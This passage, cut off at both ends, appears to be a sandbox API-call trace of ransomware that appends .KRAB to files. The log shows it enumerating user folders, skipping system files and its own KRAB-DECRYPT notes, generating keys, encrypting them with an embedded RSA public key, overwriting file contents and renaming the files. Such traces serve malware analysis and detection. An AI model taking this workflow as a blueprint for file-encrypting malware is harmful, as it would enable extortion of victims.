returned 1 [0085.457] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0085.457] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0085.457] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0085.457] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0085.457] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0085.457] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0085.457] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0085.457] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0085.457] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0085.457] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.457] FindNextFileW (in: hFindFile=0x10234f8, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 0 [0085.457] FindClose (in: hFindFile=0x10234f8 | out: hFindFile=0x10234f8) returned 1 [0085.457] CloseHandle (hObject=0x43c) returned 1 [0085.458] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 1 [0085.458] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0085.458] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0085.458] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\KRAB-DECRYPT.txt" [0085.458] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.458] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\KRAB-DECRYPT.txt.KRAB") returned 68 [0085.458] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\KRAB-DECRYPT.txt") returned 63 [0085.458] lstrlenW (lpString=".txt") returned 4 [0085.458] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.459] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0085.459] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.459] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\KRAB-DECRYPT.txt") returned 63 [0085.459] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\Java\\KRAB-DECRYPT.txt") returned 63 [0085.459] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0085.459] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0085.459] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0085.459] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0085.459] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0085.459] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0085.459] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0085.459] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0085.459] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0085.459] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0085.459] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.460] FindNextFileW (in: hFindFile=0x10230f8, lpFindFileData=0x338ead0 | out: lpFindFileData=0x338ead0) returned 0 [0085.460] FindClose (in: hFindFile=0x10230f8 | out: hFindFile=0x10230f8) returned 1 [0085.460] CloseHandle (hObject=0x474) returned 1 [0085.460] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 1 [0085.460] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0085.460] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0085.460] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\KRAB-DECRYPT.txt" [0085.460] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.461] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\KRAB-DECRYPT.txt.KRAB") returned 63 [0085.461] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\KRAB-DECRYPT.txt") returned 58 [0085.461] lstrlenW (lpString=".txt") returned 4 [0085.461] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.461] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0085.461] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.461] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\KRAB-DECRYPT.txt") returned 58 [0085.461] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Sun\\KRAB-DECRYPT.txt") returned 58 [0085.462] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0085.462] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0085.462] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0085.462] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0085.462] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0085.462] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0085.462] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0085.462] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0085.462] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0085.462] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0085.462] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.462] FindNextFileW (in: hFindFile=0x1022ff8, lpFindFileData=0x338ed50 | out: lpFindFileData=0x338ed50) returned 0 [0085.462] FindClose (in: hFindFile=0x1022ff8 | out: hFindFile=0x1022ff8) returned 1 [0085.462] CloseHandle (hObject=0x3a8) returned 1 [0085.463] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0085.463] lstrcmpW (lpString1="Uk4A4D.mkv", lpString2=".") returned 1 [0085.463] lstrcmpW (lpString1="Uk4A4D.mkv", lpString2="..") returned 1 [0085.463] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="Uk4A4D.mkv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Uk4A4D.mkv") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Uk4A4D.mkv" [0085.463] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.463] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Uk4A4D.mkv.KRAB") returned 53 [0085.463] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Uk4A4D.mkv") returned 48 [0085.463] lstrlenW (lpString=".mkv") returned 4 [0085.463] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.463] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".mkv ") returned 5 [0085.464] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.464] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Uk4A4D.mkv") returned 48 [0085.464] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Uk4A4D.mkv") returned 48 [0085.464] lstrcmpiW (lpString1="Uk4A4D.mkv", lpString2="desktop.ini") returned 1 [0085.464] lstrcmpiW (lpString1="Uk4A4D.mkv", lpString2="autorun.inf") returned 1 [0085.464] lstrcmpiW (lpString1="Uk4A4D.mkv", lpString2="ntuser.dat") returned 1 [0085.464] lstrcmpiW (lpString1="Uk4A4D.mkv", lpString2="iconcache.db") returned 1 [0085.464] lstrcmpiW (lpString1="Uk4A4D.mkv", lpString2="bootsect.bak") returned 1 [0085.464] lstrcmpiW (lpString1="Uk4A4D.mkv", lpString2="boot.ini") returned 1 [0085.464] lstrcmpiW (lpString1="Uk4A4D.mkv", lpString2="ntuser.dat.log") returned 1 [0085.464] lstrcmpiW (lpString1="Uk4A4D.mkv", lpString2="thumbs.db") returned 1 [0085.464] lstrcmpiW (lpString1="Uk4A4D.mkv", lpString2="KRAB-DECRYPT.html") returned 1 [0085.464] lstrcmpiW (lpString1="Uk4A4D.mkv", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.464] lstrcmpiW (lpString1="Uk4A4D.mkv", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.464] lstrcmpiW (lpString1="Uk4A4D.mkv", lpString2="ntldr") returned 1 [0085.464] lstrcmpiW (lpString1="Uk4A4D.mkv", lpString2="NTDETECT.COM") returned 1 [0085.464] lstrcmpiW (lpString1="Uk4A4D.mkv", lpString2="Bootfont.bin") returned 1 [0085.464] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.465] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010a40) returned 1 [0085.466] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.467] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.467] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.467] CryptGenRandom (in: hProv=0x1010a40, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0085.467] CryptReleaseContext (hProv=0x1010a40, dwFlags=0x0) returned 1 [0085.467] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.467] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010b50) returned 1 [0085.470] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.471] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.471] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.471] CryptGenRandom (in: hProv=0x1010b50, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0085.471] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0085.471] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.471] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10110a0) returned 1 [0085.473] CryptImportKey (in: hProv=0x10110a0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x1022ff8) returned 1 [0085.473] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.473] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.473] GetLastError () returned 0x0 [0085.473] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0085.473] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0085.473] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011018) returned 1 [0085.475] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x10230f8) returned 1 [0085.475] CryptGetKeyParam (in: hKey=0x10230f8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.475] CryptEncrypt (in: hKey=0x10230f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.475] GetLastError () returned 0x0 [0085.475] CryptDestroyKey (hKey=0x10230f8) returned 1 [0085.475] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0085.475] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Uk4A4D.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\uk4a4d.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0085.476] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.476] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.477] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x18d95, lpOverlapped=0x0) returned 1 [0085.522] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xfffe726b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.522] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x18d95, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x18d95, lpOverlapped=0x0) returned 1 [0085.523] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0085.523] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.527] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.527] CloseHandle (hObject=0x3a8) returned 1 [0085.527] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.528] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Uk4A4D.mkv" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\uk4a4d.mkv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Uk4A4D.mkv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\uk4a4d.mkv.krab")) returned 1 [0085.528] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.529] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0085.529] lstrcmpW (lpString1="VVJ6XMwAK4m90kYU220.ods", lpString2=".") returned 1 [0085.529] lstrcmpW (lpString1="VVJ6XMwAK4m90kYU220.ods", lpString2="..") returned 1 [0085.529] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="VVJ6XMwAK4m90kYU220.ods" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\VVJ6XMwAK4m90kYU220.ods") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\VVJ6XMwAK4m90kYU220.ods" [0085.529] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.529] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\VVJ6XMwAK4m90kYU220.ods.KRAB") returned 66 [0085.529] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\VVJ6XMwAK4m90kYU220.ods") returned 61 [0085.529] lstrlenW (lpString=".ods") returned 4 [0085.529] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.530] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".ods ") returned 5 [0085.530] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.530] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\VVJ6XMwAK4m90kYU220.ods") returned 61 [0085.530] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\VVJ6XMwAK4m90kYU220.ods") returned 61 [0085.530] lstrcmpiW (lpString1="VVJ6XMwAK4m90kYU220.ods", lpString2="desktop.ini") returned 1 [0085.530] lstrcmpiW (lpString1="VVJ6XMwAK4m90kYU220.ods", lpString2="autorun.inf") returned 1 [0085.531] lstrcmpiW (lpString1="VVJ6XMwAK4m90kYU220.ods", lpString2="ntuser.dat") returned 1 [0085.531] lstrcmpiW (lpString1="VVJ6XMwAK4m90kYU220.ods", lpString2="iconcache.db") returned 1 [0085.531] lstrcmpiW (lpString1="VVJ6XMwAK4m90kYU220.ods", lpString2="bootsect.bak") returned 1 [0085.531] lstrcmpiW (lpString1="VVJ6XMwAK4m90kYU220.ods", lpString2="boot.ini") returned 1 [0085.531] lstrcmpiW (lpString1="VVJ6XMwAK4m90kYU220.ods", lpString2="ntuser.dat.log") returned 1 [0085.531] lstrcmpiW (lpString1="VVJ6XMwAK4m90kYU220.ods", lpString2="thumbs.db") returned 1 [0085.531] lstrcmpiW (lpString1="VVJ6XMwAK4m90kYU220.ods", lpString2="KRAB-DECRYPT.html") returned 1 [0085.531] lstrcmpiW (lpString1="VVJ6XMwAK4m90kYU220.ods", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.531] lstrcmpiW (lpString1="VVJ6XMwAK4m90kYU220.ods", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.531] lstrcmpiW (lpString1="VVJ6XMwAK4m90kYU220.ods", lpString2="ntldr") returned 1 [0085.531] lstrcmpiW (lpString1="VVJ6XMwAK4m90kYU220.ods", lpString2="NTDETECT.COM") returned 1 [0085.531] lstrcmpiW (lpString1="VVJ6XMwAK4m90kYU220.ods", lpString2="Bootfont.bin") returned 1 [0085.531] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.531] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010820) returned 1 [0085.533] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.533] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.534] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.534] CryptGenRandom (in: hProv=0x1010820, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0085.534] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0085.534] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.534] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011018) returned 1 [0085.535] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.536] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.536] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.536] CryptGenRandom (in: hProv=0x1011018, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0085.536] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0085.536] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.537] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010b50) returned 1 [0085.538] CryptImportKey (in: hProv=0x1010b50, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x1023238) returned 1 [0085.538] CryptGetKeyParam (in: hKey=0x1023238, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.538] CryptEncrypt (in: hKey=0x1023238, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.538] GetLastError () returned 0x0 [0085.539] CryptDestroyKey (hKey=0x1023238) returned 1 [0085.539] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0085.539] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10110a0) returned 1 [0085.540] CryptImportKey (in: hProv=0x10110a0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x1022ff8) returned 1 [0085.540] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.540] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.541] GetLastError () returned 0x0 [0085.541] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0085.541] CryptReleaseContext (hProv=0x10110a0, dwFlags=0x0) returned 1 [0085.541] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\VVJ6XMwAK4m90kYU220.ods" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\vvj6xmwak4m90kyu220.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0085.541] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.541] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.542] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0xcea8, lpOverlapped=0x0) returned 1 [0085.557] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff3158, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.557] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xcea8, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0xcea8, lpOverlapped=0x0) returned 1 [0085.557] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0085.558] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.562] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.562] CloseHandle (hObject=0x3a8) returned 1 [0085.562] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.562] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\VVJ6XMwAK4m90kYU220.ods" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\vvj6xmwak4m90kyu220.ods"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\VVJ6XMwAK4m90kYU220.ods.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\vvj6xmwak4m90kyu220.ods.krab")) returned 1 [0085.563] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.564] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0085.564] lstrcmpW (lpString1="waoGyRe3.mp3", lpString2=".") returned 1 [0085.564] lstrcmpW (lpString1="waoGyRe3.mp3", lpString2="..") returned 1 [0085.564] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="waoGyRe3.mp3" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\waoGyRe3.mp3") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\waoGyRe3.mp3" [0085.564] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.564] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\waoGyRe3.mp3.KRAB") returned 55 [0085.564] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\waoGyRe3.mp3") returned 50 [0085.564] lstrlenW (lpString=".mp3") returned 4 [0085.564] VirtualAlloc 